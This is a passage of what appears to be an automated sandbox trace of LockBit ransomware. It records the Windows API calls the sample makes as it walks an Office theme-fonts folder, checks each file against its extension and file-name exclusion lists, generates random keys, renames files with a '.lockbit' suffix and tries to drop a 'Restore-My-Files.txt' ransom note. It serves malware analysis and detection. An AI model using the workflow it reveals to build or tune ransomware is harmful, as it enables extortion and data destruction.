NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.861] malloc (_Size=0xbe) returned 0x1fa2ed8 [0195.861] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0195.861] free (_Block=0x1fa2ed8) [0195.861] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.861] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.861] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.861] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18b81500, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18b81500, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe39, dwReserved0=0x0, dwReserved1=0x0, cFileName="Newsprint.xml", cAlternateFileName="NEWSPR~1.XML")) returned 1 [0195.861] lstrcmpiW (lpString1=".", lpString2="Newsprint.xml") returned -1 [0195.861] lstrcmpiW (lpString1="..", lpString2="Newsprint.xml") returned -1 [0195.861] PathFindExtensionW (pszPath="Newsprint.xml") returned=".xml" [0195.861] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.861] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.861] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.862] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Newsprint.xml") returned 1 [0195.863] lstrcmpiW (lpString1="ntldr", lpString2="Newsprint.xml") returned 1 [0195.863] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Newsprint.xml") returned 1 [0195.863] lstrcmpiW (lpString1="bootsect.bak", lpString2="Newsprint.xml") returned -1 [0195.863] lstrcmpiW (lpString1="autorun.inf", lpString2="Newsprint.xml") returned -1 [0195.863] lstrcmpiW (lpString1="thumbs.db", lpString2="Newsprint.xml") returned 1 [0195.863] lstrcmpiW (lpString1="iconcache.db", lpString2="Newsprint.xml") returned -1 [0195.863] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.863] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml") returned=".xml" [0195.863] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.863] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.864] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.864] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.865] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.865] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.865] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.865] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml.lockbit") returned 87 [0195.865] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\newsprint.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.866] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.866] malloc (_Size=0x40068) returned 0x3df0008 [0195.866] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3641) returned 1 [0195.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.867] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.867] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.872] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.872] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.872] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0195.872] free (_Block=0x1fa2ed8) [0195.872] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.872] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.873] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.873] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefe70d00, ftCreationTime.dwHighDateTime=0x1c9b824, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xefe70d00, ftLastWriteTime.dwHighDateTime=0x1c9b824, nFileSizeHigh=0x0, nFileSizeLow=0xe15, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office 2.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0195.873] lstrcmpiW (lpString1=".", lpString2="Office 2.xml") returned -1 [0195.873] lstrcmpiW (lpString1="..", lpString2="Office 2.xml") returned -1 [0195.873] PathFindExtensionW (pszPath="Office 2.xml") returned=".xml" [0195.873] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.873] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.874] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Office 2.xml") returned 1 [0195.874] lstrcmpiW (lpString1="ntldr", lpString2="Office 2.xml") returned -1 [0195.875] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Office 2.xml") returned -1 [0195.875] lstrcmpiW (lpString1="bootsect.bak", lpString2="Office 2.xml") returned -1 [0195.875] lstrcmpiW (lpString1="autorun.inf", lpString2="Office 2.xml") returned -1 [0195.875] lstrcmpiW (lpString1="thumbs.db", lpString2="Office 2.xml") returned 1 [0195.875] lstrcmpiW (lpString1="iconcache.db", lpString2="Office 2.xml") returned -1 [0195.875] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.875] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml") returned=".xml" [0195.875] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.875] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.875] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.876] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.876] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.876] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.876] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.876] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.876] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.876] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.876] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.876] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.876] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml.lockbit") returned 86 [0195.876] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office 2.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.877] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.878] malloc (_Size=0x40068) returned 0x3df0008 [0195.878] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3605) returned 1 [0195.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.879] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.884] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.884] malloc (_Size=0xc2) returned 0x1fa2ed8 [0195.884] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0xc0000008 [0195.884] free (_Block=0x1fa2ed8) [0195.884] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.884] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.884] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.884] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefe70d00, ftCreationTime.dwHighDateTime=0x1c9b824, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xefe70d00, ftLastWriteTime.dwHighDateTime=0x1c9b824, nFileSizeHigh=0x0, nFileSizeLow=0xe01, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office Classic 2.xml", cAlternateFileName="OFFICE~3.XML")) returned 1 [0195.884] lstrcmpiW (lpString1=".", lpString2="Office Classic 2.xml") returned -1 [0195.884] lstrcmpiW (lpString1="..", lpString2="Office Classic 2.xml") returned -1 [0195.884] PathFindExtensionW (pszPath="Office Classic 2.xml") returned=".xml" [0195.885] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.885] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.886] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Office Classic 2.xml") returned 1 [0195.886] lstrcmpiW (lpString1="ntldr", lpString2="Office Classic 2.xml") returned -1 [0195.886] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Office Classic 2.xml") returned -1 [0195.887] lstrcmpiW (lpString1="bootsect.bak", lpString2="Office Classic 2.xml") returned -1 [0195.887] lstrcmpiW (lpString1="autorun.inf", lpString2="Office Classic 2.xml") returned -1 [0195.887] lstrcmpiW (lpString1="thumbs.db", lpString2="Office Classic 2.xml") returned 1 [0195.887] lstrcmpiW (lpString1="iconcache.db", lpString2="Office Classic 2.xml") returned -1 [0195.887] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.887] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml") returned=".xml" [0195.887] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.887] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.887] lstrcmpiW 